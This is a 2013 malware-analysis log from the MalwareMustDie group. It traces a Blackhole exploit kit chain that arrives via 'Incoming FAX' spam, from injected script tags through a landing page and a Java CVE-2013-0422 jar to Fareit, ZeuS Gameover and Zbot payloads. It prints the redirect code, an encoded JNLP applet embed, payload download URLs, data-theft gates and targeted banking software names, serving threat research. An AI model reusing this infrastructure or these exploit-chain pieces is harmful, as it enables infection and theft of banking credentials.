MalwareMustDie

#MalwareMustDie! Peeking at Recent Blackhole via IncomingFAX

Sep 19th, 2013
  1. // #MalwareMustDie! The Blackhole infection
  2. // via Incoming FAX Report Spam
  3. // Same infection method as in the previous post: http://malwaremustdie.blogspot.jp/2013/09/how-greedy-cyber-scums-are-leaked-plan.html
  4. // No Medfos found this time; a Zbot Agent/downloader was grabbed.
  5. // Sample: http://www.mediafire.com/?6p5al38dlxdlchr
  6. // @unixfreaxjp ~]$ date
  7. // Thu Sep 19 21:22:54 JST 2013
  8.  
  9.  
  10. --2013-09-19 18:59:58-- h00p://oakadventures.com/widow/index.html
  11. Resolving oakadventures.com... seconds 0.00, 50.63.73.1
  12. Caching oakadventures.com => 50.63.73.1
  13. Connecting to oakadventures.com|50.63.73.1|:80... seconds 0.00, connected.
  14. :
  15. GET /widow/index.html HTTP/1.0
  16. Host: oakadventures.com
  17. HTTP request sent, awaiting response...
  18. :
  19. HTTP/1.1 200 OK
  20. Date: Thu, 19 Sep 2013 10:00:01 GMT
  21. Server: Apache
  22. Accept-Ranges: bytes
  23. Vary: Accept-Encoding
  24. Content-Length: 442
  25. Keep-Alive: timeout=5, max=100
  26. Connection: Keep-Alive
  27. Content-Type: text/html
  28. :
  29. 200 OK
  30. Length: 442 [text/html]
  31. Saving to: `index.html'
  32. 2013-09-19 18:59:59 (14.5 MB/s) - `index.html' saved [442/442]
  33.  
  34.  
  35. // cat...
  36.  
  37. <script type="text/javascript" src="h00p://0068421.netsolhost.com/partisanship/poached.js"></script>
  38. <script type="text/javascript" src="h00p://ade-data.com/exuded/midyear.js"></script>
  39. <script type="text/javascript" src="h00p://fangstudios.com/macedonian/piles.js"></script>
  40.  
  41.  
  42. --2013-09-19 19:01:57-- h00p://0068421.netsolhost.com/partisanship/poached.js
  43. Resolving 0068421.netsolhost.com... seconds 0.00, 206.188.192.64
  44. Caching 0068421.netsolhost.com => 206.188.192.64
  45. Connecting to 0068421.netsolhost.com|206.188.192.64|:80... seconds 0.00, connected.
  46. :
  47. GET /partisanship/poached.js HTTP/1.0
  48. Referer: malwaremustdie.org
  49. Host: 0068421.netsolhost.com
  50. HTTP request sent, awaiting response...
  51. :
  52. HTTP/1.1 200 OK
  53. Date: Thu, 19 Sep 2013 10:01:57 GMT
  54. Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
  55. Last-Modified: Thu, 19 Sep 2013 10:00:12 GMT
  56. ETag: "e84aac-47-4e6b99ea839fb"
  57. Accept-Ranges: bytes
  58. Content-Length: 71
  59. Keep-Alive: timeout=3, max=200
  60. Connection: Keep-Alive
  61. Content-Type: application/javascript
  62. :
  63. 200 OK
  64. Length: 71 [application/javascript]
  65. Saving to: `poached.js'
  66. 2013-09-19 19:01:58 (2.02 MB/s) - `poached.js' saved [71/71]
  67.  
  68. // cat...
  69.  
  70. document.location='h00p://louievozza.com/topic/seconds-exist-foot.php';
  71.  
  72. // ZA LANDING PAGE ..
  73.  
  74. --2013-09-19 19:03:48-- h00p://louievozza.com/topic/seconds-exist-foot.php
  75. Resolving louievozza.com... seconds 0.00, 174.140.169.145
  76. Caching louievozza.com => 174.140.169.145
  77. Connecting to louievozza.com|174.140.169.145|:80... seconds 0.00, connected.
  78. :
  79. GET /topic/seconds-exist-foot.php HTTP/1.0
  80. Referer: malwaremustdie.org
  81. Host: louievozza.com
  82. HTTP request sent, awaiting response...
  83. :
  84. HTTP/1.1 200 OK
  85. Server: nginx/0.7.67
  86. Date: Thu, 19 Sep 2013 10:03:47 GMT
  87. Content-Type: text/html
  88. Connection: close
  89. X-Powered-By: PHP/5.3.14-1~dotdeb.0
  90. :
  91. 200 OK
  92. Length: unspecified [text/html]
  93. Saving to: `seconds-exist-foot.php'
  94. 2013-09-19 19:03:51 (44.2 KB/s) - `seconds-exist-foot.php' saved [69693]
  95.  
  96. // Had three exploitations... see pic,
  97.  
  98. // JNLP goes here:
  99.  
  100. <applet width=\"1\" height=\"1\"><param name=\"jnlp_href\" value=\"!G28!!1bbaI.jnlp\"/><PA
  101. RAM name=\"jnlp_embedded\" value=\"PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gDQo
  102. 8am5scCBzcGVjPSIxLjAiIHhtbG5zOmpmeD0iaHR0cDovL2phdmFmeC5jb20iPiANCjxpbmZvcm1hdGlvbj4gDQo8d
  103. Gl0bGU+Sk5MUDwvdGl0bGU+IA0KPHZlbmRvcj5KTkxQPC92ZW5kb3I+IA0KPGRlc2NyaXB0aW9uPkpOTFA8L2Rlc2N
  104. yaXB0aW9uPiANCjxvZmZsaW5lLWFsbG93ZWQvPiANCjwvaW5mb3JtYXRpb24+IA0KPHJlc291cmNlcz4gDQoJPGoyc
  105. 2UgdmVyc2lvbj0iMS42KyIgaHJlZj0iaHR0cDovL2phdmEuc3VuLmNvbS9wcm9kdWN0cy9hdXRvZGwvajJzZSIvPiA
  106. NCgk8amFyIGhyZWY9Ii90b3BpYy9zZWNvbmRzLWV4aXN0LWZvb3QucGhwPzN3ITBfXz04VkN4aTV4JjghTV8hbVItN
  107. SoyNFNMPUQqXzU2IiBtYWluPSJ0cnVlIi8+IA0KPC9yZXNvdXJjZXM+IA0KPGFwcGxldC1kZXNjIG5hbWU9IkpuIiB
  108. tYWluLWNsYXNzPSJNYWluIiB3aWR0aD0iMiIgaGVpZ2h0PSIyIj4NCiA8cGFyYW0gdmFsdWU9InRydWUiIG5hbWU9I
  109. l9fYXBwbGV0X3Nzdl92YWxpZGF0ZWQiPjwvcGFyYW0+IA0KPC9hcHBsZXQtZGVzYz4gDQo8L2pubHA+\"/><param
  110. name=\"prime\" value=\"iym.ttyw3D3x6NNmmZ8N0Dmcb_c_MrMr&#37;_?RK2ifchb_&#37;_rre_BrVrcre_V
  111. re_BR4=cLGE9rLSb__RP6&r4yB8fJbrpmU5_8#RqNcmbNhvpL1ahfYuPhOODyy3Ojj-tK8evtUUVw&#37;t0jyt38&
  112. #37;jie&#37;toMimek8iym.ttyw3D3x5s6L1M6b_c_MrMr&#37;_?RXaNfrb___B__r&#37;rV_c_r_M_B__Rvs4m
  113. sU/=Bb__RcKfBJ1NThLbI6AfzdLPrP-RNif64mzobPDNF&#37;Ai\"></param><param value=\"Dyy3Ojj-tK8e
  114. vtUUVw&#37;t0jyt38&#37;jie&#37;toMimek8\" name=\"val\"/><param name=\"duFJfXw\" value=\"ht
  115. tp://louievozza.com/topic/seconds-exist-foot.php?1__--Mi_m*h-9=w9wd8d8cwb&uKs092=wcw88ew78
  116. a898ewa8ew7&5H94!FCN84y=ww&61U85*t7i0I=8Q-zVw*iX&k_9!-=_2vQ!43R20LB62::h00p://louievozza.c
  117. om/topic/seconds-exist-foot.php?V!G1!43d1=w9wd8d8cwb&OR_*08!=www7ww8c8aw9w8wdw7ww&v!*G5-*G
  118. zTH7=ww&9u0!7I*3_P!24=W1g*0DS468*!6l&_!s015-D!n=6h_(qcgs!\"></param></applet>";
  119.  
  120.  
  121. //Non-JNLP goes here:
  122.  
  123. "h00p://louievozza.com/topic/seconds-exist-foot.php?3w!0__=8VCxi5x&8!M_!mR-5*24SL=D*_56\"
  124. "h00p://louievozza.com/topic/seconds-exist-foot.php?3w!0__=8VCxi5x&8!M_!mR-5*24SL=D*_56\"
  125.  
  126. --2013-09-19 19:26:21-- h00p://louievozza.com/topic/seconds-exist-foot.php?3w!0__=8VCxi5x&8!M_!mR-5*24SL=D*_56
  127. Resolving louievozza.com... seconds 0.00, 174.140.169.145
  128. Caching louievozza.com => 174.140.169.145
  129. Connecting to louievozza.com|174.140.169.145|:80... seconds 0.00, connected.
  130. :
  131. GET /topic/seconds-exist-foot.php?3w!0__=8VCxi5x&8!M_!mR-5*24SL=D*_56 HTTP/1.0
  132. Referer: malwareMUSTdie.org
  133. Host: louievozza.com
  134. HTTP request sent, awaiting response...
  135. :
  136. HTTP/1.1 200 OK
  137. Server: nginx/0.7.67
  138. Date: Thu, 19 Sep 2013 10:26:20 GMT
  139. Content-Type: application/java-archive
  140. Connection: keep-alive
  141. Content-Length: 30699
  142. X-Powered-By: PHP/5.3.14-1~dotdeb.0
  143. ETag: "71c92ebc2a889d3541ff6f20b4740868"
  144. Last-Modified: Thu, 19 Sep 2013 10:26:19 GMT
  145. Accept-Ranges: bytes
  146. :
  147. 200 OK
  148. Registered socket 1896 for persistent reuse.
  149. Length: 30699 (30K) [application/java-archive]
  150. Saving to: `java1.jar'
  151. 3-09-19 19:26:24 (36.4 KB/s) - `java1.jar' saved [30699/30699]
  152.  
  153. // Is a CVE-2013-0422... I saw this before...where? hmm..
  154. // getMBeanInstantiator
  155. // com.sun.jmx.mbeanserver.Introspector
  156. // javax.management.MbeanServerDelegateboolean
  157. // com.sun.jmx.mbeanserver.JmxMBeanServer
  158. // newMBeanServer
  159. // :
  160. // ah.. the same as previous findings (Doh!)
  161. // Link: http://malwaremustdie.blogspot.jp/2013/09/how-greedy-cyber-scums-are-leaked-plan.html
  162.  
  163.  
  164. // To make a long story short... payload:
  165.  
  166. h00p://louievozza.com/adobe/update_flash_player.exe
  167.  
  168. GET /adobe/update_flash_player.exe HTTP/1.0
  169. Referer: malwaremustdie.org
  170. Host: louievozza.com
  171. HTTP request sent, awaiting response...
  172. :
  173. HTTP/1.1 200 OK
  174. Server: nginx/0.7.67
  175. Date: Thu, 19 Sep 2013 10:30:55 GMT
  176. Content-Type: application/octet-stream
  177. Connection: keep-alive
  178. Content-Length: 113664
  179. Last-Modified: Thu, 19 Sep 2013 10:30:01 GMT
  180. Accept-Ranges: bytes
  181. :
  182. 200 OK
  183. Registered socket 1896 for persistent reuse.
  184. Length: 113664 (111K) [application/octet-stream]
  185. Saving to: `update_flash_player.exe'
  186. 2013-09-19 19:31:00 (50.8 KB/s) - `update_flash_player.exe' saved [113664/113664]
  187.  
  188.  
  189. // This is the usual Win32/Fareit
  190.  
  191.  
  192. VT: https://www.virustotal.com/en/file/7765902c6023647365c4f471c6eeb4d4bfd2e26b759c092135d138f4365c696d/analysis/1379589491/
  193. SHA256: 7765902c6023647365c4f471c6eeb4d4bfd2e26b759c092135d138f4365c696d
  194. SHA1: 5e7a2032fea221beae9d509f92061ab0f1ae6578
  195. MD5: c08233e8051214fd65db330ca8b9dd6c
  196. File size: 111.0 KB ( 113664 bytes )
  197. File name: sample1.exe
  198. File type: Win32 EXE
  199. Detection ratio: 14 / 48
  200. Analysis date: 2013-09-19 11:18:11 UTC ( 0 minutes ago )
  201.  
  202.  
  203. The gates where the stolen data is posted..
  204.  
  205. h00p://louievozza.com/forum/viewtopic.php
  206. h00p://louvozza.com/forum/viewtopic.php
  207. h00p://lv-contracting.com/forum/viewtopic.php
  208. h00p://lvconcordecontracting.com/forum/viewtopic.php
  209.  
  210. The download locations for the other payloads..
  211.  
  212. h00p://arya-foundation.de/6Zt.exe
  213. h00p://jaycees.co.uk/zHHgp2.exe
  214. h00p://familiapaixao.coconet-us.com/tmMTo.exe
  215. h00p://www.maschinen.be/gMYiQdv.exe
  216.  
  217.  
  218. // The ZeuS Gameover...(downloaded by Fareit)
  219.  
  220. URL: https://www.virustotal.com/en/file/a8757588dc0fa034fd94c8a682eeb401b02180c90f8cd5e9ade63fc03823cce9/analysis/1379589455/
  221. SHA256: a8757588dc0fa034fd94c8a682eeb401b02180c90f8cd5e9ade63fc03823cce9
  222. SHA1: 61ce0ab07b794de746755a5bb1b53fc079c62b19
  223. MD5: 674b386f0cb0acec8ea8af4cd7c431c6
  224. File size: 300.5 KB ( 307712 bytes )
  225. File name: oqxub.exe
  226. File type: Win32 EXE
  227. Detection ratio: 9 / 48
  228. Analysis date: 2013-09-19 11:17:35 UTC ( 0 minutes ago )
  229.  
  230. Injection targets:
  231.  
  232. launchpadshell.exe
  233. dirclt32.exe
  234. wtng.exe
  235. prologue.exe
  236. pcsws.exe
  237. fdmaster.exe
  238.  
  239.  
  240. // brute logins..
  241.  
  242. bancline
  243. fidelity
  244. micrsolv
  245. bankman
  246. vantiv
  247. episys
  248. jack henry
  249. cruisenet
  250. gplusmain
  251.  
  252.  
  253. // Zbot Trojan/Agent..
  254.  
  255. URL: https://www.virustotal.com/en/file/efc0f51ba94a496de612bc8431d169720b47df01d21958834156af1c3d7cf589/analysis/1379589429/
  256. SHA256: efc0f51ba94a496de612bc8431d169720b47df01d21958834156af1c3d7cf589
  257. SHA1: 24ee0efe80d4ddb5e5559df79aacd35f41e56f88
  258. MD5: 5b95cc82cbec4f5705c10d13d59874a6
  259. File size: 43.0 KB ( 44078 bytes )
  260. File name: ydYGTvG.exe
  261. File type: Win32 EXE
  262. Detection ratio: 20 / 48
  263. Analysis date: 2013-09-19 11:17:09 UTC ( 0 minutes ago )
  264.  
  265. Reg: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders
  266.  
  267. Downloaded (driver)
  268. File name IvrufsinNomz.dll
  269. File Size 13824 bytes
  270. File Type PE32 (DLL) (GUI) x386
  271. MD5 b9bc7440d733e4346d45011ea649c6e4
  272.  
  273. Connection:
  274.  
  275. YAhoO.Com 98.139.183.24
  276. mta6.am0.yahoodns.net 66.196.118.34
  277. HOtMaIl.cOM 157.55.152.112
  278. mx2.HOtMaIl.cOM 65.55.37.104
  279.  
  280. ---
  281. #MalwareMUSTDiee!!!
  282. @unixfreaxjp